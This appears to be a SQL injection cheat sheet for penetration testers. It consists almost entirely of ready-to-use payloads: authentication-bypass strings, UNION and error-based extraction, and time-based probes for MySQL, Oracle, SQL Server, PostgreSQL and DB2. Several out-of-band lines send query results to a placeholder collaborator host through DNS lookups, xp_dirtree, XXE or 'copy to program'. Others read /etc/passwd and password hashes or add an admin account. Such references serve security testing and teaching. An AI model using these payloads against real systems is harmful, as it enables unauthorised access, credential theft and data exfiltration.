- Testing for SQL Injection (WSTG-INPV-05)
- SecLists
- Exploiting hard filtered SQL injections
- SQLi filter evasion cheat sheet (MySQL)
- SQLi Mitigation
- NetSPI SQL Injection Wiki: MySQL | Oracle | SQL Server | PostgreSQL
- SQL Injection (PortSwigger Web Security Academy)
- SQL Injection cheat sheet (PortSwigger Web Security Academy)
- SQL Smuggling Or, The Attack That Wasn’t There (PDF on Wayback Machine)
Vulnerability description for reporting available in VulnDB (GitHub)
See labs WebSecurityAcademy (PortSwigger) – SQL Injections.
For specific database cheat sheets, see PostgreSQL, MSSQL, SQLite, MySQL, IBM DB2, Oracle Database.
Tools: Burp Suite, SQLmap, SQLninja, Pentest-Tools.com
Detection
Detect SQL injection vulnerabilities by fuzzing all inputs to generate an error :
- Parameters in URL, e.g. http://www.example.com/index.php?username=1’%20or%20’1’%20=%20’1&password=1’%20or%20’1’%20=%20’1
- Elements from the user interface, like search box, login forms, etc.
- Hidden fields
- HTTP Headers
- Cookies
Payloads to try :
'
;
"
--
/* */
AND
OR
enter a string when expecting a number
ASCII(97)
' OR 1=1--
'; waitfor delay ('0:0:20')--
exec master..xp_dirtree '//<id>.burpcollaborator.net/a'Bypass Authentication / Login forms
Example 1
SELECT * FROM Users WHERE Username='$username' AND Password='$password'| Username | Password |
1' or '1'='1 | 1′ or ‘1’=’1 |
| administrator’ — | foo |
Example 2
SELECT * FROM Users WHERE ((Username='$username') AND (Password=MD5('$password')))| Username | Password |
1' or '1' = '1'))/*1' or '1' = '1')) LIMIT 1/* | foo |
Other payloads
<username>' OR 1=1--
'OR '' = ' Allows authentication without a valid username.
<username>'--
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
'OR 1=1--
# In login field
' or 1=1 --
') or 1=1 LIMIT 0,1 --
1' or '1'='1
admin' or '1 --
' union select (select group_concat(username, password) from users), 2 --
1 or (select substr(group_concat(username, password),i,1) from users) = (select char(j)) --
%bf' or 1=1 --
# In password field
' or 1=1 --
# Auth Bypass From SecLists
" or 1=1
" or 1=1#
" or 1=1--
" or 1=1/*
' or 1=1
' or 1=1#
' or 1=1--
' or 1=1/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 " AND 1=0 UNION ALL SELECT "root", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'root', '81dc9bdb52d04dc20036dbd8313ed055
admin" #
admin" --
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin"/*
admin"or 1=1 or ""="
admin' #
admin' --
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin'/*
admin'or 1=1 or ''='
or 1=1
or 1=1#
or 1=1--
or 1=1/*
root" #
root" --
root" or "1"="1
root" or "1"="1"#
root" or "1"="1"--
root" or "1"="1"/*
root" or 1=1
root" or 1=1 or ""="
root" or 1=1#
root" or 1=1--
root" or 1=1/*
root") or "1"="1
root") or "1"="1"#
root") or "1"="1"--
root") or "1"="1"/*
root") or ("1"="1
root") or ("1"="1"#
root") or ("1"="1"--
root") or ("1"="1"/*
root"/*
root' #
root' --
root' or '1'='1
root' or '1'='1'#
root' or '1'='1'--
root' or '1'='1'/*
root' or 1=1
root' or 1=1#
root' or 1=1--
root' or 1=1/*
root') or '1'='1
root') or '1'='1'#
root') or '1'='1'--
root') or '1'='1'/*
root') or ('1'='1
root') or ('1'='1'#
root') or ('1'='1'--
root') or ('1'='1'/*
root'/*
root'or 1=1 or ''='Data Extraction – UNION Technique
Find the number of columns in the query
Using the ORDER BY clause
Add the ORDER BY clause at the end of the vulnerable parameter:
1 ORDER BY 10--Unknown column '10' in 'order clause'Using NULL with the UNION clause
UNION technique
10 UNION SELECT 1,null,null--
1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTableFind which columns are displayed
1 union all select 1, 2, 3, ...In forms
| SQL Query | Parameter value |
SELECT * FROM products WHERE id_product=$id_product | 10 OR 1=1Stacked queries 10; INSERT INTO users (…)Error based (Oracle) 10||UTL_INADDR.GET_HOST_NAME((SELECT user FROM DUAL))--ORA-292257: host SCOTT unknown |
SELECT Name, Phone, Address FROM Users WHERE Id=$id | To find the number of columns for UNION technique10 ORDER BY 10--Unknown column '10' in 'order clause'UNION technique 10 UNION SELECT 1,null,null--1 UNION ALL SELECT creditCardNumber,1,1 FROM CreditCardTable |
1; wait for delay '0:15:0'--
' or 1=1 --Error based
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='aMySQL / MariaDB
| Description | Syntax |
|---|---|
| String concatenation | ‘foo’ ‘bar’ CONCAT(‘foo’,’bar’) |
| Substring | SUBSTRING(‘foobar’, 4, 2) |
| Comments | #comment — comment (with space after –) /*comment*/ |
| Database version | SELECT @@version |
| Database contents | SELECT * FROM information_schema.columns WHERE table_name = ‘TABLE-NAME-HERE’ |
| Batched (or stacked) queries | query1; query2 |
Conditional errors
SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')Extracting data via visible error messages
SELECT 'foo' WHERE 1=1 AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT 'secret')))
> XPATH syntax error: '\secret'Conditional time delays / Time-based
Waits 10 seconds when the condition is true.
SELECT IF(YOUR-CONDITION-HERE,SLEEP(10),'a')DNS lookup (Windows only)
LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a')
SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'Data exfiltration
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'Payload examples
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
' UNION SELECT 1, sql FROM sqlite_master WHERE type='table' --
' UNION SELECT table_schema || '.' || table_name from information_schema.tables --
' UNION SELECT column_name from information_schema.columns where table_name='<table name>' --Oracle
For queries, see Oracle Database. Test queries on Oracle Live SQL.
| Description | Syntax |
|---|---|
| String concatenation | ‘foo’||’bar’ |
| Substring | SUBSTR(‘foobar’, 4, 2) |
| Comments | –comment /*comment*/ |
| Database version | SELECT banner FROM v$version SELECT version FROM v$instance |
| Database contents | SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = ‘TABLE-NAME-HERE’ |
| Batched (or stacked) queries | Not supported |
Injection can also be in PL-SQL
upd_stmt := 'update t set x=' || :val || ', etc.etc.';;
execute immediate upd_stmt;Conditional errors
' AND (SELECT CASE WHEN (banner LIKE 'Oracle%') THEN TO_CHAR(1/0) ELSE NULL END FROM v$version) IS NULL --Conditional time delays / Time-based
Waits 10 seconds when the condition is true.
' AND (SELECT CASE WHEN (1=1) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE 'a'||dbms_pipe.receive_message(('a'),0) END FROM dual) IS NOT NULL -- ' AND (SELECT CASE WHEN (banner like 'Oracle%') THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE 'a'||dbms_pipe.receive_message(('a'),0) END FROM v$version) IS NOT NULL -- DNS lookup
(XXE) vulnerability to trigger a DNS lookup (older versions)
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dual(XXE) vulnerability + data exfiltration
SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.BURP-COLLABORATOR-SUBDOMAIN/"> %remote;]>'),'/l') FROM dualDNS lookup (all versions) – requires elevated privileges
SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')Bypass filters
If a specific character is blocked, try using Burp Suite extension Transfuzz (GitHub). Send the request to the Intruder module, highlight the blocked character as the variable, and choose Payload type Extension-generated.
See Obfuscating Queries (NetSPI).
' OR 1=1 -- '/**/OR/**/1=1/**/--/**/Payload examples
' or '1'='1
' or '1'='1
' || utl_http.request('http://x.x.x.x/')||'
' || myappadmin.adduser('admin', 'newpass') || '
' || UTL_INADDR.GET_HOST_NAME((SELECT user FROM DUAL) )--
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.LOGIN_USER FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT global_name FROM global_name)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(USERNAME)) FROM SYS.ALL_USERS)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='iMicrosoft SQL Server
| Description | Syntax |
|---|---|
| String concatenation | ‘foo’+’bar’ |
| Substring | SUBSTRING(‘foobar’, 4, 2) |
| Comments | –comment /*comment*/ |
| Database version | SELECT @@version |
| Database contents | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = ‘TABLE-NAME-HERE’ |
| Batched (or stacked) queries | query1; query2 query1 query2 |
Conditional errors
SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL ENDExtracting data via visible error messages
SELECT 'foo' WHERE 1 = (SELECT 'secret')
> Conversion failed when converting the varchar value 'secret' to data type int.Conditional time delays / Time-based
Waits 10 seconds when the condition is true.
IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'DNS lookup
exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'Data exfiltration
declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR-SUBDOMAIN/a"')PostgreSQL
| Description | Syntax |
|---|---|
| String concatenation | ‘foo’||’bar’ |
| Substring | SUBSTRING(‘foobar’, 4, 2) |
| Comments | –comment /*comment*/ |
| Database version | SELECT version() |
| Database contents | SELECT * FROM information_schema.columns WHERE table_name = ‘TABLE-NAME-HERE’ |
| Batched (or stacked) queries | query1; query2 |
Conditional errors
1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/(SELECT 0) ELSE NULL END)Extracting data via visible error messages
SELECT CAST((SELECT password FROM users LIMIT 1) AS int)
> invalid input syntax for integer: "secret"Conditional time delays / Time-based
Waits 10 seconds when the condition is true.
SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) ENDDNS lookup
copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN'Data exfiltration
create OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR-SUBDOMAIN''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();Payload examples
select version();
select current_database();
select current_user;
select session_user;
select current_setting('log_connections');
select current_setting('log_statement');
select current_setting('port');
select current_setting('password_encryption');
select current_setting('krb_server_keyfile');
select current_setting('virtual_host');
select current_setting('port');
select current_setting('config_file');
select current_setting('hba_file');
select current_setting('data_directory');
select * from pg_shadow;
select * from pg_group;
create table myfile (input TEXT);
copy myfile from '/etc/passwd';
select * from myfile;copy myfile to /tmp/test;DB2 for Unix
| Description | Syntax |
|---|---|
| String concatenation | ‘foo’||’bar’ CONCAT(‘FIRSTNME’foo’, ‘bar’) |
| Substring | SUBSTRING(‘foobar’, 4, 2) |
| Comments | — comment /* comment */ |
| Database version | select versionnumber, version_timestamp from sysibm.sysversions; |
| Database contents | |
| Batched (or stacked) queries |
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
select current server from sysibm.sysdummy1;
select name from sysibm.systables;
select grantee from syscat.dbauth;
select * from syscat.tabauth;
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select name, tbname, coltype from sysibm.syscolumns;
select schemaname FROM syscat.schemata;